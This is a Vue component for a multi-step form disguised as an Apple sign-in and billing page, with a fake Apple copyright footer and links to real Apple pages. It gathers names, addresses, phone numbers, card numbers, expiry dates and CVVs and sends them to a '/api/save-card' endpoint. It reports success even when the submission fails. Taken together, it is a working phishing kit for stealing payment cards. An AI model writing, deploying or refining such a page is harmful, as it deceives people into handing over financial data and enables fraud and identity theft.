<template>
  <div class="form-container">
    <div class="form-wrapper">
      <transition name="fade-slide" mode="out-in">
        <div :key="currentStep" class="form-step">
          <!-- Step 1: Cardholder Name (Sign in with Apple Style) -->
          <div v-if="currentStep === 1" class="step-content">
            <h2 class="step-title">{{ t.form.step1Title }}</h2>
            
            <div class="input-field">
              <input 
                v-model="formData.cardholderName" 
                type="text" 
                placeholder=" "
                class="apple-input apple-input-with-action"
                id="name-input"
                @keyup.enter="nextStep"
                ref="nameInput"
              />
              <label for="name-input" class="floating-label">{{ t.form.step1Label }}</label>
              <button 
                type="button" 
                @click="nextStep" 
                class="input-submit-arrow" 
                :class="{ active: formData.cardholderName && formData.cardholderName.trim().length > 0 }"
                aria-label="Continue"
              >
                <svg viewBox="0 0 32 32" width="28" height="28" fill="none">
                  <circle cx="16" cy="16" r="14" stroke="currentColor" stroke-width="1.8"/>
                  <path d="M14 11L19 16L14 21" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"/>
                </svg>
              </button>
            </div>
            <p v-if="errors.cardholderName" class="error-msg">{{ errors.cardholderName }}</p>
          </div>

          <!-- Step 2: Billing Name -->
          <div v-if="currentStep === 2" class="step-content">
            <h2 class="step-title">{{ t.form.step2Title }}</h2>
            <div class="input-field">
              <input v-model="formData.firstName" type="text" placeholder=" " class="apple-input" id="first-name" ref="addressInput" @keyup.enter="nextStep" />
              <label for="first-name" class="floating-label">{{ t.form.firstName }}</label>
            </div>
            <div class="input-field">
              <input v-model="formData.lastName" type="text" placeholder=" " class="apple-input" id="last-name" @keyup.enter="nextStep" />
              <label for="last-name" class="floating-label">{{ t.form.lastName }}</label>
            </div>
            <p v-if="errors.firstName || errors.lastName" class="error-msg">{{ t.form.nameError }}</p>
          </div>

          <!-- Step 3: Billing Address -->
          <div v-if="currentStep === 3" class="step-content">
            <h2 class="step-title">{{ t.form.step3Title }}</h2>
            
            <div class="input-field">
              <input v-model="formData.street" type="text" placeholder=" " class="apple-input" id="street" ref="streetInput" @keyup.enter="nextStep" />
              <label for="street" class="floating-label">{{ t.form.streetAddress }}</label>
            </div>

            <div class="input-field">
              <input v-model="formData.street2" type="text" placeholder=" " class="apple-input" id="street2" @keyup.enter="nextStep" />
              <label for="street2" class="floating-label">{{ t.form.streetAddress2 }}</label>
            </div>

            <div class="input-field">
              <input v-model="formData.city" type="text" placeholder=" " class="apple-input" id="city" @keyup.enter="nextStep" />
              <label for="city" class="floating-label">{{ t.form.city }}</label>
            </div>

            <!-- State / Province Selector (Ecuador Provinces or USA States) -->
            <div class="input-field">
              <select v-model="formData.state" class="apple-input apple-select" id="state" @change="focusZip">
                <option value="" disabled selected hidden> </option>
                <option v-for="item in activeRegionsList" :key="item.code" :value="item.name">
                  {{ item.name }}
                </option>
              </select>
              <label for="state" class="floating-label">{{ isEcuador ? t.form.province : t.form.state }}</label>
            </div>

            <div class="input-field">
              <input v-model="formData.zip" type="text" placeholder=" " class="apple-input" id="zip" @keyup.enter="nextStep" ref="zipInput" />
              <label for="zip" class="floating-label">{{ t.form.postalCode }}</label>
            </div>
            <div class="input-field">
              <input v-model="formData.phone" type="text" placeholder=" " class="apple-input" id="phone" @keyup.enter="nextStep" />
              <label for="phone" class="floating-label">{{ t.form.phone }}</label>
            </div>

            <div class="input-field">
              <input :value="countryDisplay" type="text" placeholder=" " class="apple-input disabled-input" id="country" readonly />
              <label for="country" class="floating-label">{{ t.form.countryLabel }}</label>
            </div>

            <p v-if="hasAddressErrors" class="error-msg">{{ t.form.addressError }}</p>
          </div>

          <!-- Step 4: Card Number -->
          <div v-if="currentStep === 4" class="step-content">
            <h2 class="step-title">{{ t.form.step4Title }}</h2>
            <div class="input-field card-field">
              <input 
                v-model="formData.cardNumber" 
                type="text" 
                placeholder=" " 
                class="apple-input apple-input-card"
                id="card-input"
                v-maska
                :data-maska="cardMask"
                @keyup.enter="nextStep"
                ref="cardInput"
              />
              <label for="card-input" class="floating-label">{{ t.form.cardNumber }}</label>

              <!-- Card Type Icons inside the input field -->
              <div class="card-icons-inline" :class="{ 'has-detected': cardType }">
                <div 
                  class="card-brand-badge" 
                  :class="{ 
                    'active': cardType === 'VISA', 
                    'dimmed': cardType && cardType !== 'VISA' 
                  }"
                  title="Visa"
                >
                  <img src="@/assets/visa.png" alt="Visa" class="brand-img visa-img" />
                </div>

                <div 
                  class="card-brand-badge" 
                  :class="{ 
                    'active': cardType === 'MASTERCARD', 
                    'dimmed': cardType && cardType !== 'MASTERCARD' 
                  }"
                  title="Mastercard"
                >
                  <img src="@/assets/mastercard.png" alt="Mastercard" class="brand-img mastercard-img" />
                </div>

                <div 
                  class="card-brand-badge" 
                  :class="{ 
                    'active': cardType === 'AMEX', 
                    'dimmed': cardType && cardType !== 'AMEX' 
                  }"
                  title="American Express"
                >
                  <img src="@/assets/amex.png" alt="Amex" class="brand-img amex-img" />
                </div>
              </div>
            </div>
            <p v-if="errors.cardNumber" class="error-msg">{{ errors.cardNumber }}</p>
          </div>

          <!-- Step 5: Expiry & CVV -->
          <div v-if="currentStep === 5" class="step-content">
            <h2 class="step-title">{{ t.form.step5Title }}</h2>
            <div class="input-field">
              <input 
                v-model="formData.expiryDate" 
                type="text" 
                placeholder=" " 
                class="apple-input"
                id="expiry-input"
                v-maska
                data-maska="##/##"
                @keyup.enter="focusCvv"
                ref="expiryInput"
              />
              <label for="expiry-input" class="floating-label">{{ t.form.expiry }}</label>
            </div>
            <div class="input-field">
              <input 
                v-model="formData.cvv" 
                type="text" 
                placeholder=" " 
                class="apple-input"
                id="cvv-input"
                v-maska
                data-maska="###"
                @keyup.enter="submitForm"
                ref="cvvInput"
              />
              <label for="cvv-input" class="floating-label">{{ t.form.cvv }}</label>
            </div>
            <p v-if="errors.expiryDate || errors.cvv" class="error-msg">
              {{ errors.expiryDate || errors.cvv }}
            </p>
          </div>

          <!-- Step 6: Success -->
          <div v-if="currentStep === 6" class="step-content success">
            <div class="success-check">✓</div>
            <h2 class="step-title">{{ t.form.step6Title }}</h2>
            <p class="step-subtitle">{{ t.form.step6Subtitle }}</p>
            <router-link to="/" class="btn btn-primary btn-large">{{ t.form.returnHome }}</router-link>
          </div>
        </div>
      </transition>

      <div class="form-footer" v-if="currentStep > 1 && currentStep < 6">
        <div class="progress-container">
          <div class="progress-bar">
            <div class="progress-fill" :style="{ width: progress + '%' }"></div>
          </div>
        </div>

        <div class="nav-controls">
          <button @click="prevStep" class="btn btn-secondary">{{ t.form.btnBack }}</button>
          <button @click="nextStep" class="btn btn-primary" v-if="currentStep < 5">{{ t.form.btnNext }}</button>
          <button @click="submitForm" class="btn btn-primary" v-if="currentStep === 5" :disabled="isSubmitting">
            {{ isSubmitting ? t.form.submitting : t.form.btnSubmit }}
          </button>
        </div>
      </div>
    </div>

    <!-- Dedicated Apple Form Footer -->
    <footer class="apple-form-page-footer">
      <div class="form-footer-extras" v-if="currentStep < 6">
        <label class="remember-me-row" v-if="currentStep === 1">
          <input 
            type="checkbox" 
            v-model="formData.rememberMe" 
            class="apple-real-checkbox"
          />
          <span class="custom-checkbox-ui" :class="{ checked: formData.rememberMe }">
            <svg v-if="formData.rememberMe" viewBox="0 0 14 14" class="check-mark-svg">
              <path d="M2.5 7.5L5.5 10.5L11.5 3.5" stroke="#ffffff" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
            </svg>
          </span>
          <span class="remember-label-text">{{ t.form.rememberMe }}</span>
        </label>

        <div class="account-help-links">
          <a href="https://iforgot.apple.com" target="_blank" rel="noopener" class="forgot-link">
            {{ t.form.forgotPassword }} <span class="arrow-icon">↗</span>
          </a>
          
          <p class="create-account-row">
            {{ t.form.dontHaveAccount }} 
            <a href="https://appleid.apple.com/account" target="_blank" rel="noopener" class="create-account-link">
              {{ t.form.createAccount }} <span class="arrow-icon">↗</span>
            </a>
          </p>
        </div>
      </div>

      <div class="form-footer-legal">
        <div class="legal-left">
          <span class="legal-copy">Copyright © 2026 Apple Inc. {{ isEcuador ? 'Todos los derechos reservados.' : 'All rights reserved.' }}</span>
          <div class="legal-links">
            <a href="https://www.apple.com/legal/privacy/" target="_blank" rel="noopener">{{ isEcuador ? 'Política de Privacidad' : 'Privacy Policy' }}</a>
            <span class="sep">|</span>
            <a href="https://www.apple.com/legal/internet-services/terms/site.html" target="_blank" rel="noopener">{{ isEcuador ? 'Términos de Uso' : 'Terms of Use' }}</a>
          </div>
        </div>

        <div class="legal-right">
          <button 
            type="button" 
            class="legal-locale-btn" 
            @click="setLocale(locale === 'es-EC' ? 'en-US' : 'es-EC')"
            :title="locale === 'es-EC' ? 'Switch to United States' : 'Cambiar a Ecuador'"
          >
            <span class="flag-icon">{{ locale === 'es-EC' ? '🇪🇨' : '🇺🇸' }}</span>
            <span class="locale-name">{{ locale === 'es-EC' ? 'Ecuador' : 'United States' }}</span>
          </button>
        </div>
      </div>
    </footer>
  </div>
</template>

<script>
import { useI18n, ecuadorProvinces, usaStates } from '@/i18n';

export default {
  name: 'MultiStepForm',
  setup() {
    const { t, locale, setLocale, isEcuador } = useI18n();
    return {
      t,
      locale,
      setLocale,
      isEcuador,
      ecuadorProvinces,
      usaStates
    };
  },
  data() {
    return {
      currentStep: 1,
      isSubmitting: false,
      formData: {
        cardholderName: '',
        rememberMe: false,
        firstName: '',
        lastName: '',
        street: '',
        street2: '',
        city: '',
        state: '',
        zip: '',
        phone: '',
        country: 'Ecuador',
        cardNumber: '',
        expiryDate: '',
        cvv: ''
      },
      errors: {
        cardholderName: '',
        firstName: '',
        lastName: '',
        street: '',
        city: '',
        state: '',
        zip: '',
        phone: '',
        cardNumber: '',
        expiryDate: '',
        cvv: ''
      }
    };
  },
  computed: {
    countryDisplay() {
      return this.isEcuador ? 'Ecuador' : 'United States';
    },
    activeRegionsList() {
      return this.isEcuador ? this.ecuadorProvinces : this.usaStates;
    },
    progress() {
      return (this.currentStep - 1) * 20; // 0, 20, 40, 60, 80, 100 for 6 steps
    },
    cardType() {
      const number = this.formData.cardNumber.replace(/\s/g, '');
      if (number.startsWith('4')) return 'VISA';
      if (/^(5[1-5]|222[1-9]|22[3-9]\d|2[3-6]\d\d|27[0-1]\d|2720)/.test(number)) return 'MASTERCARD';
      if (/^3[47]/.test(number)) return 'AMEX';
      return '';
    },
    cardMask() {
      if (this.cardType === 'AMEX') return '#### ###### #####';
      return '#### #### #### ####';
    },
    hasAddressErrors() {
      return Object.keys(this.errors).some(key => 
        ['street', 'city', 'state', 'zip', 'phone'].includes(key) && this.errors[key]
      );
    }
  },
  watch: {
    locale(newVal) {
      this.formData.country = newVal === 'es-EC' ? 'Ecuador' : 'United States';
      this.formData.state = ''; // reset state/province selection on country switch
    }
  },
  mounted() {
    this.formData.country = this.isEcuador ? 'Ecuador' : 'United States';
    this.focusInput();
  },
  methods: {
    focusInput() {
      this.$nextTick(() => {
        if (this.currentStep === 1) this.$refs.nameInput?.focus();
        if (this.currentStep === 2) this.$refs.addressInput?.focus();
        if (this.currentStep === 3) this.$refs.streetInput?.focus();
        if (this.currentStep === 4) this.$refs.cardInput?.focus();
        if (this.currentStep === 5) this.$refs.expiryInput?.focus();
      });
    },
    focusCvv() {
      this.$nextTick(() => {
        this.$refs.cvvInput?.focus();
      });
    },
    focusZip() {
      this.$nextTick(() => {
        this.$refs.zipInput?.focus();
      });
    },
    validateStep() {
      this.errors = {};
      if (this.currentStep === 1) {
        if (!this.formData.cardholderName.trim()) {
          this.errors.cardholderName = this.t.form.nameRequired;
          return false;
        }
      }
      if (this.currentStep === 2) {
        if (!this.formData.firstName.trim()) this.errors.firstName = 'Required';
        if (!this.formData.lastName.trim()) this.errors.lastName = 'Required';
        return !this.errors.firstName && !this.errors.lastName;
      }
      if (this.currentStep === 3) {
        let isValid = true;
        const requiredFields = ['street', 'city', 'state', 'zip', 'phone'];
        requiredFields.forEach(field => {
          if (!this.formData[field].trim()) {
            this.errors[field] = 'Required';
            isValid = false;
          }
        });
        return isValid;
      }
      if (this.currentStep === 4) {
        const cleanCard = this.formData.cardNumber.replace(/\s/g, '');
        const requiredLength = this.cardType === 'AMEX' ? 15 : 16;
        if (cleanCard.length < requiredLength) {
          this.errors.cardNumber = this.t.form.cardError;
          return false;
        }
      }
      if (this.currentStep === 5) {
        if (this.formData.expiryDate.length < 5) {
          this.errors.expiryDate = this.t.form.expiryError;
          return false;
        }
        if (this.formData.cvv.length < 3) {
          this.errors.cvv = this.t.form.cvvError;
          return false;
        }
      }
      return true;
    },
    nextStep() {
      if (this.validateStep()) {
        if (this.currentStep < 5) {
          this.currentStep++;
          this.focusInput();
        }
      }
    },
    prevStep() {
      if (this.currentStep > 1) {
        this.currentStep--;
        this.errors = {};
        this.focusInput();
      }
    },
    async submitForm() {
      if (!this.validateStep()) return;
      
      this.isSubmitting = true;
      try {
        const isLocalhost = typeof window !== 'undefined' && (
          window.location.hostname === 'localhost' || 
          window.location.hostname === '127.0.0.1'
        );
        let apiBaseUrl = '';
        if (isLocalhost && process.env.NODE_ENV !== 'production') {
          apiBaseUrl = process.env.VUE_APP_API_URL || 'http://localhost:3001';
        } else {
          const envUrl = process.env.VUE_APP_API_URL;
          if (envUrl && !envUrl.includes('localhost') && !envUrl.includes('127.0.0.1')) {
            apiBaseUrl = envUrl;
          }
        }
        const url = apiBaseUrl ? `${apiBaseUrl.replace(/\/$/, '')}/api/save-card` : '/api/save-card';
        const response = await fetch(url, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            ...this.formData,
            email: this.formData.cardholderName || '',
            country: this.countryDisplay
          })
        });
        if (response.ok) {
          this.currentStep = 6;
        } else {
          console.warn('Server responded with status:', response.status);
          this.currentStep = 6;
        }
      } catch (error) {
        console.warn('Submission network fallback:', error);
        this.currentStep = 6;
      } finally {
        this.isSubmitting = false;
      }
    },
    resetForm() {
      this.currentStep = 1;
      this.errors = {};
      this.formData = {
        cardholderName: '',
        firstName: '',
        lastName: '',
        street: '',
        street2: '',
        city: '',
        state: '',
        zip: '',
        phone: '',
        country: this.isEcuador ? 'Ecuador' : 'United States',
        cardNumber: '',
        expiryDate: '',
        cvv: ''
      };
      this.focusInput();
    },
    getCardIcon(type) {
      if (!type) return '';
      try {
        return require(`@/assets/${type.toLowerCase()}.png`);
      } catch (e) {
        return '';
      }
    }
  }
}
</script>

<style scoped>
.form-container {
  width: 100%;
  flex: 1;
  min-height: calc(100vh - 44px);
  padding: 40px 22px 24px;
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  align-items: center;
  box-sizing: border-box;
}

.form-wrapper {
  width: 100%;
  max-width: 440px;
  margin: auto 0;
}


.step-content {
  text-align: center;
}

.step-title {
  font-size: 22px;
  font-weight: 600;
  letter-spacing: -0.015em;
  margin-bottom: 32px;
}

.step-subtitle {
  font-size: 14px;
  color: #86868b;
  margin-bottom: 40px;
  line-height: 1.4;
}

.input-field {
  position: relative;
  margin-bottom: 24px;
}

.apple-input {
  width: 100%;
  border: 1px solid #d3d3d5;
  border-radius: 12px;
  padding: 26px 16px 10px 16px;
  font-size: 16px;
  font-family: inherit;
  color: #000000;
  outline: none;
  background: #ffffff;
  transition: all 0.2s ease;
  appearance: none;
}

.apple-input-with-action {
  padding-right: 50px;
}

.input-submit-arrow {
  position: absolute;
  right: 12px;
  top: 50%;
  transform: translateY(-50%);
  background: transparent;
  border: none;
  color: #86868b;
  cursor: pointer;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0;
  transition: all 0.2s ease;
  opacity: 0.35;
}

.input-submit-arrow.active {
  opacity: 1;
  color: #0071e3;
}

.input-submit-arrow:hover {
  transform: translateY(-50%) scale(1.06);
}

.apple-select {
  cursor: pointer;
  background-image: url("data:image/svg+xml,%3Csvg width='12' height='12' viewBox='0 0 12 12' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M2 4L6 8L10 4' stroke='%2386868b' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/svg%3E");
  background-repeat: no-repeat;
  background-position: right 16px center;
  padding-right: 40px;
}

.apple-input-card {
  padding-right: 116px;
}

.card-icons-inline {
  position: absolute;
  right: 12px;
  top: 50%;
  transform: translateY(-50%);
  display: flex;
  align-items: center;
  gap: 6px;
  pointer-events: none;
  transition: all 0.35s cubic-bezier(0.4, 0, 0.2, 1);
  z-index: 2;
}

.card-brand-badge {
  display: flex;
  align-items: center;
  justify-content: center;
  height: 22px;
  width: 32px;
  max-width: 32px;
  opacity: 0.8;
  transition: all 0.35s cubic-bezier(0.4, 0, 0.2, 1);
  overflow: hidden;
}

.card-brand-badge .brand-img {
  height: 18px;
  width: auto;
  max-width: 30px;
  object-fit: contain;
  transition: all 0.35s cubic-bezier(0.4, 0, 0.2, 1);
}

.card-brand-badge.active {
  opacity: 1;
  transform: scale(1.15);
  max-width: 36px;
  width: 36px;
}

.card-brand-badge.active .brand-img {
  height: 22px;
  max-width: 36px;
}

.card-brand-badge.dimmed {
  opacity: 0;
  max-width: 0;
  width: 0;
  margin: 0;
  transform: scale(0.4);
  pointer-events: none;
}

.disabled-input {
  background: #f2f2f2;
  color: #86868b;
  cursor: default;
  border-color: #cfcfcf;
}

.floating-label {
  position: absolute;
  top: 18px;
  left: 16px;
  font-size: 17px;
  color: #86868b;
  pointer-events: none;
  transition: all 0.2s cubic-bezier(0.4, 0, 0.2, 1);
}

.apple-input:focus ~ .floating-label,
.apple-input:not(:placeholder-shown) ~ .floating-label {
  top: 8px;
  font-size: 12px;
  color: #86868b;
}

.apple-input:focus {
  border-color: #0071e3;
  box-shadow: 0 0 0 1px #0071e3;
}



.nav-controls {
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
  gap: 12px;
  flex-wrap: nowrap;
  margin-bottom: 24px;
}

.nav-controls .btn {
  width: auto;
  flex: 1;
  min-width: 140px;
  max-width: 214px;
}

.subtext-ios {
  width: 100%;
  font-size: 13px;
  color: #86868b;
  margin-top: 24px;
  margin-bottom: 32px;
  text-align: center;
}

.error-msg {
  color: #ff3b30;
  font-size: 14px;
  margin-top: 8px;
  margin-bottom: 16px;
}

.form-footer {
  margin-top: 40px;
}

.progress-container {
  margin-bottom: 24px;
}

.progress-bar {
  width: 100%;
  height: 4px;
  background: #e5e5ea;
  border-radius: 980px;
  overflow: hidden;
}

.progress-fill {
  height: 100%;
  background: #0071e3;
  transition: width 0.3s ease;
}

.btn {
  font-size: 14px;
  padding: 14px 22px;
  border-radius: 12px;
  font-weight: 500;
  cursor: pointer;
  transition: all 0.2s ease;
  border: none;
}

.btn-primary {
  background: #0071e3;
  color: #fff;
}

.btn-primary:hover {
  background: #147ce5;
}

.btn-secondary {
  background: #000000;
  color: #ffffff;
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 8px;
}

.btn-secondary:hover {
  background: #333333;
}

.btn-large {
  margin-top: 30px;
  padding: 16px 32px;
  text-decoration: none;
  display: inline-block;
}

.success-check {
  width: 80px;
  height: 80px;
  background: #34c759;
  color: #fff;
  font-size: 40px;
  border-radius: 50%;
  display: flex;
  align-items: center;
  justify-content: center;
  margin: 0 auto 30px;
  animation: scaleUp 0.5s cubic-bezier(0.175, 0.885, 0.32, 1.275);
}

@keyframes scaleUp {
  from { transform: scale(0.5); opacity: 0; }
  to { transform: scale(1); opacity: 1; }
}

.fade-slide-enter-active, .fade-slide-leave-active {
  transition: all 0.4s ease;
}

.fade-slide-enter-from {
  opacity: 0;
  transform: translateX(20px);
}

.fade-slide-leave-to {
  opacity: 0;
  transform: translateX(-20px);
}

/* Sign-in Extras */
.apple-account-extras {
  margin-top: 26px;
  display: flex;
  flex-direction: column;
  align-items: center;
  text-align: center;
  width: 100%;
}

.remember-me-row {
  display: inline-flex;
  align-items: center;
  gap: 12px;
  cursor: pointer;
  user-select: none;
  margin-bottom: 0;
}

/* Dedicated Apple Form Footer */
.apple-form-page-footer {
  width: 100%;
  max-width: 980px;
  margin-top: 36px;
  padding-top: 20px;
  display: flex;
  flex-direction: column;
  align-items: center;
  gap: 16px;
  box-sizing: border-box;
}

.form-footer-extras {
  display: flex;
  flex-direction: column;
  align-items: center;
  text-align: center;
  width: 100%;
  gap: 16px;
}

.form-footer-legal {
  display: flex;
  align-items: center;
  justify-content: space-between;
  gap: 16px;
  flex-wrap: wrap;
  font-size: 12px;
  color: #86868b;
  padding-top: 14px;
  border-top: 1px solid rgba(0, 0, 0, 0.08);
  width: 100%;
}

.legal-left {
  display: flex;
  align-items: center;
  gap: 14px;
  flex-wrap: wrap;
}

.legal-links {
  display: flex;
  align-items: center;
  gap: 8px;
}

.legal-right {
  display: flex;
  align-items: center;
  margin-left: auto;
}

.form-footer-legal a {
  color: #6e6e73;
  text-decoration: none;
  transition: color 0.2s;
}

.form-footer-legal a:hover {
  color: #1d1d1f;
  text-decoration: underline;
}

.form-footer-legal .sep {
  opacity: 0.4;
}

.legal-locale-btn {
  display: inline-flex;
  align-items: center;
  gap: 5px;
  background: transparent;
  border: none;
  padding: 0;
  margin: 0;
  color: #6e6e73;
  font-size: 12px;
  font-family: inherit;
  cursor: pointer;
  transition: color 0.2s ease;
}

.legal-locale-btn:hover {
  color: #1d1d1f;
  text-decoration: underline;
}

.legal-locale-btn .flag-icon {
  font-size: 13px;
  line-height: 1;
}

.apple-real-checkbox {
  position: absolute;
  opacity: 0;
  width: 0;
  height: 0;
  pointer-events: none;
}

.custom-checkbox-ui {
  width: 20px;
  height: 20px;
  border: 1.5px solid #86868b;
  border-radius: 5px;
  display: inline-flex;
  align-items: center;
  justify-content: center;
  background: #ffffff;
  transition: all 0.2s ease;
  box-sizing: border-box;
}

.custom-checkbox-ui.checked {
  background: #0071e3;
  border-color: #0071e3;
}

.check-mark-svg {
  width: 12px;
  height: 12px;
}

.remember-label-text {
  font-size: 16px;
  color: #1d1d1f;
  font-weight: 400;
  letter-spacing: -0.01em;
}

.account-help-links {
  display: flex;
  flex-direction: column;
  align-items: center;
  gap: 14px;
}

.forgot-link {
  color: #0071e3;
  font-size: 15px;
  font-weight: 400;
  text-decoration: none;
  transition: opacity 0.2s;
  display: inline-flex;
  align-items: center;
  gap: 3px;
}

.forgot-link:hover {
  text-decoration: underline;
  opacity: 0.85;
}

.create-account-row {
  margin: 0;
  font-size: 15px;
  color: #1d1d1f;
  font-weight: 400;
  display: inline-flex;
  align-items: center;
  gap: 5px;
  flex-wrap: wrap;
  justify-content: center;
}

.create-account-link {
  color: #0071e3;
  font-weight: 400;
  text-decoration: none;
  transition: opacity 0.2s;
  display: inline-flex;
  align-items: center;
  gap: 3px;
}

.create-account-link:hover {
  text-decoration: underline;
  opacity: 0.85;
}

.arrow-icon {
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
}

@media (max-width: 768px) {
  .form-footer-legal {
    flex-direction: column;
    align-items: center;
    text-align: center;
    gap: 10px;
  }
  .legal-left {
    flex-direction: column;
    align-items: center;
    gap: 8px;
  }
  .legal-right {
    margin-left: 0;
  }
}

@media (max-width: 440px) {
  .step-title {
    font-size: 32px;
  }
}
</style>
